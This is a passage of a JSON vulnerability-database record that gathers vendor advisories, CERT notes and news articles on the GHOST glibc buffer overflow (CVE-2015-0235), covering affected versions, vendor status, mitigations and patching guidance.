"AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "suse": [{"lastseen": "2016-09-04T11:57:34", "bulletinFamily": "unix", "description": "CVE-2015-0235: A vulnerability was found and fixed in the GNU C Library,\n specifically in the function gethostbyname(), that could lead to a local\n or remote buffer overflow. 
(bsc#913646)\n\n", "modified": "2015-01-28T19:04:53", "published": "2015-01-28T19:04:53", "id": "OPENSUSE-SU-2015:0162-1", "href": "http://lists.opensuse.org/opensuse-security-announce/2015-01/msg00030.html", "type": "suse", "title": "glibc (critical)", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2016-09-04T12:08:46", "bulletinFamily": "unix", "description": "This update for glibc fixes the following security issue:\n\n CVE-2015-0235: A vulnerability was found and fixed in the GNU C Library,\n specifically in the function gethostbyname(), that could lead to a local\n or remote buffer overflow. (bsc#913646)\n\n", "modified": "2015-02-02T09:04:48", "published": "2015-02-02T09:04:48", "id": "OPENSUSE-SU-2015:0184-1", "href": "http://lists.opensuse.org/opensuse-security-announce/2015-02/msg00000.html", "title": "Security update for glibc (critical)", "type": "suse", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2016-09-04T11:18:43", "bulletinFamily": "unix", "description": "This update for glibc fixes the following security issue:\n\n CVE-2015-0235: A vulnerability was found and fixed in the GNU C Library,\n specifically in the function gethostbyname(), that could lead to a local\n or remote buffer overflow. 
(bsc#913646)\n\n Security Issues:\n\n * CVE-2015-0235\n <http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-0235>\n\n", "modified": "2015-01-28T03:04:56", "published": "2015-01-28T03:04:56", "id": "SUSE-SU-2015:0158-1", "href": "http://lists.opensuse.org/opensuse-security-announce/2015-01/msg00028.html", "title": "Security update for glibc (critical)", "type": "suse", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "threatpost": [{"lastseen": "2018-10-06T22:57:28", "bulletinFamily": "info", "description": "There are some silver linings in the wake of yesterday\u2019s disclosure of the [Ghost vulnerability in the GNU C library, glibc](<http://threatpost.com/ghost-glibc-remote-code-execution-vulnerability-affects-all-linux-systems/110679>), which affects all Linux systems and seemed to herald yet another Internet-wide vulnerability.\n\nFirst, the 15-year-old bug isn\u2019t the showstopper that the Shellshock vulnerability in Bash (Bourne Again Shell) or Heartbleed were. But that doesn\u2019t mean it won\u2019t require immediate patching. Perhaps most importantly, it seems to be fairly challenging to exploit, experts say. For now, only one major software package dependent on glibc, the Exim mail transfer agent, is in the direct line of fire. 
Researchers at [Qualys](<https://community.qualys.com/blogs/laws-of-vulnerabilities/2015/01/27/the-ghost-vulnerability>) who found the [Ghost vulnerability](<http://www.openwall.com/lists/oss-security/2015/01/27/9>) have a proof-of-concept developed specifically for the MTA, while other experts caution that it could be a matter of time before other bugs swim to the surface.\n\n\u201cSome of the services most likely to be affected would be MTAs such as Exim, plus a range of web-reachable network diagnostic tools sometimes relied on by system administrators (e.g., webpages that let you run \u2018ping\u2019 or \u2018traceroute\u2019),\u201d researcher Michal Zalewski told Threatpost. \u201cWhen it comes to client applications, browsers would be probably the most likely vector\u2014but the most popular ones are not believed to be vulnerable.\u201d\n\nZalewski, a long time bug hunter, was one of the first to find [additional security vulnerabilities in Bash](<http://threatpost.com/researcher-takes-wraps-off-two-undisclosed-shellshock-vulnerabilities-in-bash/108674>) after the emergence of Shellshock. He confirmed that a number of mitigations could stand in the way of an attacker successfully pulling off a Ghost attack.\n\n\u201cThe exploitation depends on being able to convince a program to perform a DNS lookup of a host name provided by the attacker,\u201d Zalewski said. \u201cThe lookup has to be done in a very particular way and must lack a couple of commonly-employed (but certainly not mandatory) sanity checks.\u201d\n\nGhost is a heap-based buffer overflow found in the __nss_hostname_digits_dots() function in glibc that could enable remote code execution. That particular function is used by the _gethostbyname function calls. 
The vulnerability affects glibc 2.2 through 2.17, but was patched in May 2013, though the bug was not labeled a security vulnerability at the time and as a result the patch may not have been widely deployed.\n\nIn addition to the patch, Qualys said that the gethostbyname functions are obsolete because of IPv6, with newer applications using a different call, getaddrinfo(). While the flaw is also exploitable locally, this scenario too is mitigated because many programs rely on gethostbyname only if another preliminary call fails and a secondary call succeeds in order to reach the overflow. The advisory said this is \u201cimpossible\u201d and those programs are safe.\n\nThere are mitigations against remote exploitation too, Qualys said. Servers, for example, use gethostbyname to perform full-circle reverse DNS checks. \u201cThese programs are generally safe because the hostname passed to gethostbyname() has normally been pre-validated by DNS software,\u201d the advisory said.\n\n\u201cTo be clear, this is NOT the end of the Internet as we know it, nor is it another Heartbleed. In a general sense, it\u2019s not likely to be an easy bug to exploit,\u201d said Rapid7 CSO and Metasploit creator HD Moore. \u201cStill, it could potentially be nasty if exploited so we strongly recommend immediate patching and rebooting. Without a reboot, services using the old library will not be restarted.\u201d\n\nOne of the major challenges with patching Bash, for example, was that so many services made essentially covert Bash calls. It was a chore finding all of those services before deploying patches. With Ghost, patching figures to be a bit more streamlined, with the quickest route to a fix being to deploy the patches provided by the respective Linux distributions. 
Matasano Security today published an extensive [list of Linux distributions running vulnerable versions of glibc](<http://chargen.matasano.com/chargen/2015/1/27/vulnerability-overview-ghost-cve-2015-0235.html>).\n\nRapid7\u2019s Moore cautions that sysadmins must reboot systems in order for the patch to take effect.\n\n\u201cThis can lead to a false sense of security if the proper precautions are not followed,\u201d he said. \u201cGiven that Linux is used in all sorts of hardware products, it may take a while for the vendors to ship patches for affected appliances and devices. The silver lining is that most low-end embedded devices use a lightweight alternative to glibc (uClibc or Bionic) and are therefore not vulnerable in the first place.\u201d\n\nChris Wysopal, CTO and cofounder of application security company Veracode, said any servers compromised by Ghost exploits could be turned into bots used in DDoS attacks, or attackers can use the vulnerability to install malware that could lead to data loss.\n\n\u201cThis is yet another example, like Heartbleed and Shellshock, of a reusable open source component that is widely used and also quite vulnerable,\u201d Wysopal said. \u201cIn our research, we\u2019ve found that open-source components such as glibc introduce an average of 24 known vulnerabilities into each web application. GHOST won\u2019t be as widespread as Heartbleed and Shellshock, but it\u2019s widespread enough that IT operations teams at many companies are now scrambling to find all instances so they can patch them ASAP.\u201d\n\nThe good news is that like past Internet-wide bugs, Ghost may not spawn a new spree of spin-off bugs.\n\n\u201cGlibc plays a role in almost everything that a program can do, but in most cases, the functionality involved in interacting with untrusted parties is fairly simple and robust. The glibc DNS resolver is actually one of the few exceptions to this rule. 
It is a fairly complex piece of machinery, so we will probably hear about it again,\u201d Zalewski said. \u201cThat said, I would not expect a huge spike in glibc vulnerabilities just because of this particular find.\u201d\n", "modified": "2015-01-30T20:11:03", "published": "2015-01-28T13:28:29", "id": "THREATPOST:8B5C2D5280CC957CA9A4CB0C697F96D8", "href": "https://threatpost.com/of-ghost-glibc-vulnerability-patching-and-exploits/110719/", "type": "threatpost", "title": "Ghost glibc Vulnerability Patching and Exploits", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T22:57:29", "bulletinFamily": "info", "description": "A critical vulnerability has been found in glibc, the GNU C library, that affects all Linux systems dating back to 2000. Attackers can use this flaw to execute code and remotely gain control of Linux machines.\n\nThe issue stems from a heap-based buffer overflow found in the __nss_hostname_digits_dots() function in glibc. That particular function is used by the _gethostbyname function calls.\n\n\u201cA remote attacker able to make an application call either of these functions could use this flaw to execute arbitrary code with the permissions of the user running the application,\u201d said an [advisory ](<https://bugzilla.redhat.com/show_bug.cgi?id=CVE-2015-0235>)from Linux distributor Red Hat.\n\nThe vulnerability, CVE-2015-0235, has already been nicknamed GHOST because of its relation to the _gethostbyname function. 
Researchers at Qualys discovered the flaw, and say it goes back to glibc version 2.2, published in November 2000.\n\nAccording to Qualys, a fix for this issue was published on May 21, 2013, between the glibc-2.17 and glibc-2.18 releases.\n\n\u201cUnfortunately, it was not recognized as a security threat; as a result, most stable and long-term-support distributions were left exposed (and still are): Debian 7 (wheezy), Red Hat Enterprise Linux 6 & 7, CentOS 6 & 7, Ubuntu 12.04, for example,\u201d said an [advisory](<http://www.openwall.com/lists/oss-security/2015/01/27/9>) from Qualys posted to the OSS-Security mailing list.\n\nRespective Linux distributions will be releasing patches; Red Hat has released an [update](<https://rhn.redhat.com/errata/RHSA-2015-0090.html>) for Red Hat Enterprise Linux v.5 server. Novell has a [list](<http://support.novell.com/security/cve/CVE-2015-0235.html>) of SUSE Linux Enterprise Server builds affected by the vulnerability. Debian has already released an update of its software addressing the vulnerability.\n\n\u201cIt\u2019s everywhere, which is kind of the urgency we have here. This has been in glibc for a long time. It was fixed recently, but it was not marked as a security issue, so things that are fairly new should be OK,\u201d said Josh Bressers, a member of the Red Hat security response team. \u201cFrom a threat level, what it comes down to is a handful of stuff that\u2019s probably dangerous that uses this function.\u201d\n\nUnlike past [Internet-wide bugs such as Bash](<http://threatpost.com/major-bash-vulnerability-affects-linux-unix-mac-os-x/108521>), patching glibc may not be the chore patching Bash was, since so many components made silent Bash calls.\n\n\u201cIn this instance, you just apply the glibc update, and restart any services that are vulnerable,\u201d Bressers said. 
\u201cIt\u2019s not confusing like Shellshock was.\u201d\n\nQualys, in its advisory, not only shares extremely in-depth technical information on the vulnerability, but also includes a section explaining exploitation of the Exim SMTP mail server. The advisory demonstrates how to bypass NX, or No-eXecute protection, as well as glibc malloc hardening, Qualys said.\n\nQualys also said that in addition to the 2013 patch, other factors mitigate the impact of the vulnerability, including the fact that the gethostbyname functions are obsolete because of IPv6, with newer applications using a different call, getaddrinfo(). While the flaw is also exploitable locally, this scenario too is mitigated because many programs rely on gethostbyname only if another preliminary call fails and a secondary call succeeds in order to reach the overflow. The advisory said this is \u201cimpossible\u201d and those programs are safe.\n\nThere are mitigations against remote exploitation too, Qualys said. Servers, for example, use gethostbyname to perform full-circle reverse DNS checks. \u201cThese programs are generally safe because the hostname passed to gethostbyname() has normally been pre-validated by DNS software,\u201d the advisory said.\n\n\u201cIt\u2019s not looking like a huge remote problem, right now,\u201d Bressers said.\n\nHowever, while the bug may have been dormant since 2000, there is no way to tell if criminals or government-sponsored hackers have been exploiting this vulnerability. Nor is there any way to tell what will happen once legitimate security researchers\u2014and black hats\u2014begin looking at the vulnerability now that it\u2019s out in the open. 
With Bash, for example, it didn\u2019t take long for [additional security issues to rise to the surface](<http://threatpost.com/researcher-takes-wraps-off-two-undisclosed-shellshock-vulnerabilities-in-bash/108674>).\n\n[_Image courtesy Michal Docekal _](<https://www.flickr.com/photos/lawmaker/>)\n", "modified": "2015-01-29T20:34:41", "published": "2015-01-27T12:55:29", "id": "THREATPOST:3A858BD40E6943BD3F4553301036091D", "href": "https://threatpost.com/ghost-glibc-remote-code-execution-vulnerability-affects-all-linux-systems/110679/", "type": "threatpost", "title": "GHOST glibc Linux Remote Code Execution Vulnerability", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "cert": [{"lastseen": "2018-12-25T20:17:29", "bulletinFamily": "info", "description": "### Overview \n\nThe `__nss_hostname_digits_dots()` function of the GNU C Library (glibc) allows a buffer overflow condition in which arbitrary code may be executed. This vulnerability has been assigned CVE-2015-0235, and is referred to in the media by the name \"GHOST\".\n\n### Description \n\nAccording to Qualys, the vulnerability is \"a buffer overflow in the `__nss_hostname_digits_dots()` function of the GNU C Library (`glibc`). This bug is reachable both locally and remotely via the `gethostbyname*()` functions\" and furthermore, \"arbitrary code execution can be achieved\" by use of the buffer overflow.\n\nAll versions of `glibc` from `glibc-2.2` (released 2010-11-10) until `glibc-2.17` are vulnerable. The vulnerability was patched on 2013-05-21, prior to the release of `glibc-2.18`. \n \nFor more details, please see the full [Qualys Security Advisory](<https://www.qualys.com/research/security-advisories/GHOST-CVE-2015-0235.txt>). \n \n--- \n \n### Impact \n\nThe `__nss_hostname_digits_dots()` function allows a buffer overflow condition in which arbitrary code may be executed. The impact may vary depending on if the use case is local or remote. 
\n \n--- \n \n### Solution \n\n**Apply an update** \n \nAffected users may apply a patch or update to `glibc-2.18` or later. The Vendor Status information below provides more information on updates. \n \n--- \n \n### Vendor Information\n\nSome older, no longer supported versions of Linux distributions may contain an older version of glibc that is vulnerable. Please check with your vendor to find out if you need to upgrade to a newer operating system in order to address this issue. \n \n--- \n \n### __ __ Arch Linux \n\nNotified: January 28, 2015 Updated: January 30, 2015 \n\n**Statement Date: January 28, 2015**\n\n### Status\n\n__ Affected\n\n### Vendor Statement\n\n\"`Arch Linux is not vulnerable. [Arch Linux is] on a modern version of glibc so [Arch Linux] should have been safe for 18+ months.`\"\n\n### Vendor Information\n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Addendum\n\nIf using an edition of Arch Linux older than about 18 months, you may wish to check with the vendor to find out if you need to upgrade.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23967332 Feedback>).\n\n### __ Blue Coat Systems \n\nUpdated: January 30, 2015 \n\n### Status\n\n__ Affected\n\n### Vendor Statement\n\nNo statement is currently available from the vendor regarding this vulnerability.\n\n### Vendor Information\n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Vendor References\n\n<https://bto.bluecoat.com/security-advisory/sa90>\n\n### __ Cisco Systems, Inc. 
\n\nUpdated: January 30, 2015 \n\n### Status\n\n__ Affected\n\n### Vendor Statement\n\nNo statement is currently available from the vendor regarding this vulnerability.\n\n### Vendor Information\n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Vendor References\n\n<http://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20150128-ghost>\n\n### __ Citrix \n\nUpdated: January 30, 2015 \n\n### Status\n\n__ Affected\n\n### Vendor Statement\n\nNo statement is currently available from the vendor regarding this vulnerability.\n\n### Vendor Information\n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Vendor References\n\n<http://support.citrix.com/article/CTX200391>\n\n### __ Debian GNU/Linux \n\nNotified: January 28, 2015 Updated: January 28, 2015 \n\n**Statement Date: January 28, 2015**\n\n### Status\n\n__ Affected\n\n### Vendor Statement\n\nNo statement is currently available from the vendor regarding this vulnerability.\n\n### Vendor Information\n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Vendor References\n\n<https://security-tracker.debian.org/tracker/CVE-2015-0235>\n\n### __ F5 Networks, Inc. 
\n\nUpdated: January 30, 2015 \n\n### Status\n\n__ Affected\n\n### Vendor Statement\n\nNo statement is currently available from the vendor regarding this vulnerability.\n\n### Vendor Information\n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Vendor References\n\n<https://support.f5.com/kb/en-us/solutions/public/16000/000/sol16057.html>\n\n### __ __ Gentoo Linux \n\nNotified: January 28, 2015 Updated: January 30, 2015 \n\n**Statement Date: January 29, 2015**\n\n### Status\n\n__ Affected\n\n### Vendor Statement\n\n\"Our most recent glibc packages are not affected; we'll be issuing an\n\nadvisory anyway to inform users who may still have older versions installed.\"\n\n### Vendor Information\n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### __ Juniper Networks, Inc. \n\nUpdated: January 30, 2015 \n\n### Status\n\n__ Affected\n\n### Vendor Statement\n\nNo statement is currently available from the vendor regarding this vulnerability.\n\n### Vendor Information\n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Vendor References\n\n[http://kb.juniper.net/InfoCenter/index?page=content&id=JSA10671&cat=SIRT_1&actp=](<http://kb.juniper.net/InfoCenter/index?page=content&id=JSA10671&cat=SIRT_1&actp=>)\n\n### __ __ NEC Corporation \n\nUpdated: October 22, 2015 \n\n### Status\n\n__ Affected\n\n### Vendor Statement\n\n\"We provide information on this issue at the following URL: <<http://jpn.nec.com/security-info/secinfo/nv15-007.html>> (only in Japanese).\"\n\n### Vendor Information\n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Vendor References\n\n<http://jpn.nec.com/security-info/secinfo/nv15-007.html>\n\n### __ NetApp \n\nUpdated: January 30, 2015 \n\n### Status\n\n__ Affected\n\n### Vendor Statement\n\nNo statement is currently available from the vendor regarding this vulnerability.\n\n### Vendor Information\n\nWe are not 
aware of further vendor information regarding this vulnerability.\n\n### Vendor References\n\n[https://kb.netapp.com/support/index?page=content&id=9010027](<https://kb.netapp.com/support/index?page=content&id=9010027>)\n\n### __ __ Openwall GNU/*/Linux \n\nNotified: January 28, 2015 Updated: January 30, 2015 \n\n**Statement Date: January 29, 2015**\n\n### Status\n\n__ Affected\n\n### Vendor Statement\n\n\"`Openwall GNU/*/Linux (Owl) was affected, although there's no known \nattack vector that would expose the glibc bug as a vulnerability in an \ninstall of Owl with no third-party software. We have released glibc \nupdates for Owl 3.1-stable and Owl-current on 2015/01/28.`\"\n\n### Vendor Information\n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### __ Red Hat, Inc. \n\nNotified: January 28, 2015 Updated: January 30, 2015 \n\n### Status\n\n__ Affected\n\n### Vendor Statement\n\nNo statement is currently available from the vendor regarding this vulnerability.\n\n### Vendor Information\n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Vendor References\n\n<https://access.redhat.com/security/cve/CVE-2015-0235\nhttps://rhn.redhat.com/errata/RHSA-2015-0099.html>\n\n### __ __ SUSE Linux \n\nNotified: January 28, 2015 Updated: January 28, 2015 \n\n**Statement Date: January 28, 2015**\n\n### Status\n\n__ Affected\n\n### Vendor Statement\n\n\"`SUSE Linux Enterprise 11 and older are affected by the problem. We released \nupdates \nfor all supported and affected codestreams. \n \nSUSE Linux Enterprise 12 is not affected by this problem.`\"\n\n### Vendor Information\n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Vendor References\n\n<http://support.novell.com/security/cve/CVE-2015-0235.html\nhttp://lists.suse.com/pipermail/sle-security-updates/2015-January/001186.html>\n\n### __ Slackware Linux Inc. 
\n\nNotified: January 28, 2015 Updated: January 28, 2015 \n\n**Statement Date: January 28, 2015**\n\n### Status\n\n__ Affected\n\n### Vendor Statement\n\nNo statement is currently available from the vendor regarding this vulnerability.\n\n### Vendor Information\n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Vendor References\n\n[http://www.slackware.com/security/list.php?l=slackware-security&y=2015](<http://www.slackware.com/security/list.php?l=slackware-security&y=2015>)\n\n### __ __ Ubuntu \n\nNotified: January 28, 2015 Updated: January 28, 2015 \n\n**Statement Date: January 28, 2015**\n\n### Status\n\n__ Affected\n\n### Vendor Statement\n\n\"`Ubuntu 10.04 LTS (lucid) and Ubuntu 12.04 LTS (precise) were \naffected; Ubuntu 14.04 LTS and newer releases were not, as they \nincluded versions of the GNU C Library that already contained the \nupstream fix.`\"\n\n### Vendor Information\n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Vendor References\n\n<http://www.ubuntu.com/usn/usn-2485-1/\nhttps://wiki.ubuntu.com/SecurityTeam/KnowledgeBase/GHOST>\n\n### __ __ openSUSE project \n\nNotified: January 28, 2015 Updated: January 30, 2015 \n\n**Statement Date: January 28, 2015**\n\n### Status\n\n__ Affected\n\n### Vendor Statement\n\n\"`openSUSE 13.1 and 13.2 are not affected by the problem.`\"\n\n### Vendor Information\n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Vendor References\n\n<http://support.novell.com/security/cve/CVE-2015-0235.html\nhttp://lists.suse.com/pipermail/sle-security-updates/2015-January/001186.html>\n\n### Addendum\n\nOlder versions of openSUSE may be affected. 
Check with the vendor to see if you require an upgrade.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23967332 Feedback>).\n\n### __ __ Contiki OS \n\nNotified: January 28, 2015 Updated: January 28, 2015 \n\n**Statement Date: January 28, 2015**\n\n### Status\n\n__ Not Affected\n\n### Vendor Statement\n\n\"`Contiki OS does not use the GNU libc resolver functions so is not affected \nby this.`\"\n\n### Vendor Information\n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### __ CentOS \n\nNotified: January 28, 2015 Updated: January 28, 2015 \n\n### Status\n\n__ Unknown\n\n### Vendor Statement\n\nNo statement is currently available from the vendor regarding this vulnerability.\n\n### __ Cray Inc. \n\nNotified: January 28, 2015 Updated: January 28, 2015 \n\n### Status\n\n__ Unknown\n\n### Vendor Statement\n\nNo statement is currently available from the vendor regarding this vulnerability.\n\n### __ Fedora Project \n\nNotified: January 28, 2015 Updated: January 28, 2015 \n\n### Status\n\n__ Unknown\n\n### Vendor Statement\n\nNo statement is currently available from the vendor regarding this vulnerability.\n\n### __ Hewlett-Packard Company \n\nNotified: January 28, 2015 Updated: January 28, 2015 \n\n### Status\n\n__ Unknown\n\n### Vendor Statement\n\nNo statement is currently available from the vendor regarding this vulnerability.\n\n### __ IBM Corporation (zseries) \n\nNotified: January 28, 2015 Updated: January 28, 2015 \n\n### Status\n\n__ Unknown\n\n### Vendor Statement\n\nNo statement is currently available from the vendor regarding this vulnerability.\n\n### __ IBM eServer \n\nNotified: January 28, 2015 Updated: January 28, 2015 \n\n### Status\n\n__ Unknown\n\n### Vendor Statement\n\nNo statement is currently available from the vendor regarding this vulnerability.\n\n### __ Mandriva S. A. 
\n\nNotified: January 28, 2015 Updated: January 28, 2015 \n\n### Status\n\n__ Unknown\n\n### Vendor Statement\n\nNo statement is currently available from the vendor regarding this vulnerability.\n\n### __ Oracle Corporation \n\nNotified: January 28, 2015 Updated: January 28, 2015 \n\n### Status\n\n__ Unknown\n\n### Vendor Statement\n\nNo statement is currently available from the vendor regarding this vulnerability.\n\n### __ Turbolinux \n\nNotified: January 28, 2015 Updated: January 28, 2015 \n\n### Status\n\n__ Unknown\n\n### Vendor Statement\n\nNo statement is currently available from the vendor regarding this vulnerability.\n\n \n\n\n### CVSS Metrics \n\nGroup | Score | Vector \n---|---|--- \nBase | 10.0 | AV:N/AC:L/Au:N/C:C/I:C/A:C \nTemporal | 7.8 | E:POC/RL:OF/RC:C \nEnvironmental | 5.9 | CDP:ND/TD:M/CR:ND/IR:ND/AR:ND \n \n \n\n\n### References \n\n * <https://www.qualys.com/research/security-advisories/GHOST-CVE-2015-0235.txt>\n * <http://www.openwall.com/lists/oss-security/2015/01/27/9>\n\n### Credit\n\nCredit to Qualys for discovering the vulnerability. \n\nThis document was written by Garret Wassermann. 
\n\n### Other Information\n\n**CVE IDs:** | [CVE-2015-0235](<http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-0235>) \n---|--- \n**Date Public:** | 2015-01-28 \n**Date First Published:** | 2015-01-28 \n**Date Last Updated: ** | 2015-10-22 13:00 UTC \n**Document Revision: ** | 24 \n", "modified": "2015-10-22T13:00:00", "published": "2015-01-28T00:00:00", "id": "VU:967332", "href": "https://www.kb.cert.org/vuls/id/967332", "type": "cert", "title": "GNU C Library (glibc) __nss_hostname_digits_dots() function vulnerable to buffer overflow", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "oraclelinux": [{"lastseen": "2018-08-31T01:40:57", "bulletinFamily": "unix", "description": "[2.3.4-2.57.0.1.el4.1]\n- CVE-2015-0235 Fix parsing of numeric hosts in gethostbyname_r (John Haxby) [orabug 20439586]", "modified": "2015-01-29T00:00:00", "published": "2015-01-29T00:00:00", "id": "ELSA-2015-0101", "href": "http://linux.oracle.com/errata/ELSA-2015-0101.html", "title": "glibc security update", "type": "oraclelinux", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-08-31T01:40:20", "bulletinFamily": "unix", "description": "[2.5-123.0.1.el5_11.1]\n- Switch to use malloc when the input line is too long [Orabug 19951108]\n- Use a /sys/devices/system/cpu/online for _SC_NPROCESSORS_ONLN implementation [Orabug 17642251] (Joe Jin)\n[2.5-123.1]\n- Fix parsing of numeric hosts in gethostbyname_r (CVE-2015-0235, #1183532).", "modified": "2015-01-27T00:00:00", "published": "2015-01-27T00:00:00", "id": "ELSA-2015-0090", "href": "http://linux.oracle.com/errata/ELSA-2015-0090.html", "title": "glibc security update", "type": "oraclelinux", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-08-31T01:46:39", "bulletinFamily": "unix", "description": "[2.5-123.0.1.el5_11.3]\n- Switch to use malloc when 
the input line is too long [Orabug 19951108] (Jason Luan)\n- Use a /sys/devices/system/cpu/online for _SC_NPROCESSORS_ONLN implementation [Orabug 17642251] (Joe Jin)\n[2.5-123.3]\n- Fix invalid-free when using getaddrinfo() and AI_IDN (CVE-2013-7424,\n[2.5-123.1]\n- Fix parsing of numeric hosts in gethostbyname_r (CVE-2015-0235, #1183532).", "modified": "2015-08-17T00:00:00", "published": "2015-08-17T00:00:00", "id": "ELSA-2015-1627", "href": "http://linux.oracle.com/errata/ELSA-2015-1627.html", "title": "glibc security update", "type": "oraclelinux", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "cisco": [{"lastseen": "2018-02-03T00:00:33", "bulletinFamily": "software", "description": "A vulnerability in the function of GNU glibc could allow an unauthenticated, remote attacker to execute arbitrary code, cause a denial of service condition, or access sensitive information.\n\nThe vulnerability is due to improper input validation. An unauthenticated, remote attacker could exploit this vulnerability by sending malicious requests to a targeted system.\n\nOn January 27, 2015, a buffer overflow vulnerability in the GNU C library (glibc) was publicly announced. This vulnerability is related to the various gethostbyname functions included in glibc and affects applications that call these functions. This vulnerability may allow an attacker to obtain sensitive information from an exploited system or, in some instances, perform remote code execution with the privileges of the application being exploited.\n\nThe glibc library is a commonly used third-party software component that is released by the GNU software project and a number of Cisco products are likely affected.\n\nThis advisory will be updated as additional information becomes available. Cisco will release free software updates that address this vulnerability. 
Workarounds that mitigate this vulnerability are not available.\n\nThis advisory is available at the following link:\nhttp://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20150128-ghost [\"http://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20150128-ghost\"]", "modified": "2015-07-24T17:47:13", "published": "2015-01-28T22:30:00", "id": "CISCO-SA-20150128-GHOST", "href": "https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20150128-ghost", "type": "cisco", "title": "GNU glibc gethostbyname Function Buffer Overflow Vulnerability", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "debian": [{"lastseen": "2018-10-16T22:15:04", "bulletinFamily": "unix", "description": "Package : eglibc\nVersion : 2.11.3-4+deb6u4\nCVE ID : CVE-2015-0235\n\nA vulnerability has been fixed in eglibc, Debian's version of the GNU C\nlibrary:\n\nCVE-2015-0235\n\n Qualys discovered that the gethostbyname and gethostbyname2\n functions were subject to a buffer overflow if provided with a\n crafted IP address argument. 
This could be used by an attacker to\n execute arbitrary code in processes which called the affected\n functions.\n\n The original glibc bug was reported by Peter Klotz.\n\nWe recommend that you upgrade your eglibc packages.\n\nThe other three CVEs fixed in Debian wheezy via DSA 3142-1 have already been\nfixed in squeeze LTS via DLA 97-1.\n\n\n", "modified": "2015-01-28T10:26:11", "published": "2015-01-28T10:26:11", "id": "DEBIAN:DLA-139-1:5734D", "href": "https://lists.debian.org/debian-lts-announce/2015/debian-lts-announce-201501/msg00012.html", "title": "[SECURITY] [DLA 139-1] eglibc security update", "type": "debian", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "amazon": [{"lastseen": "2018-10-02T16:55:27", "bulletinFamily": "unix", "description": "**Issue Overview:**\n\nA heap-based buffer overflow was found in glibc's __nss_hostname_digits_dots() function, which is used by the gethostbyname() and gethostbyname2() glibc function calls. A remote attacker able to make an application call either of these functions could use this flaw to execute arbitrary code with the permissions of the user running the application.\n\n \n\n\n#### Special notes:\n\nBecause of the exceptional nature of this security event, we have backfilled our 2014.03 and 2013.09 Amazon Linux AMI repositories with new glibc packages that fix [CVE-2015-0235 __](<https://access.redhat.com/security/cve/CVE-2015-0235>).\n\nFor 2014.09 Amazon Linux AMIs, _glibc-2.17-55.93.amzn1_ addresses the CVE. Running _yum clean all_ followed by _yum update glibc_ will install the fixed package, and you should reboot your instance after installing the update.\n\nFor Amazon Linux AMIs [\"locked\"](<https://aws.amazon.com/amazon-linux-ami/faqs/#lock>) to the 2014.03 repositories, the same _glibc-2.17-55.93.amzn1_ addresses the CVE. 
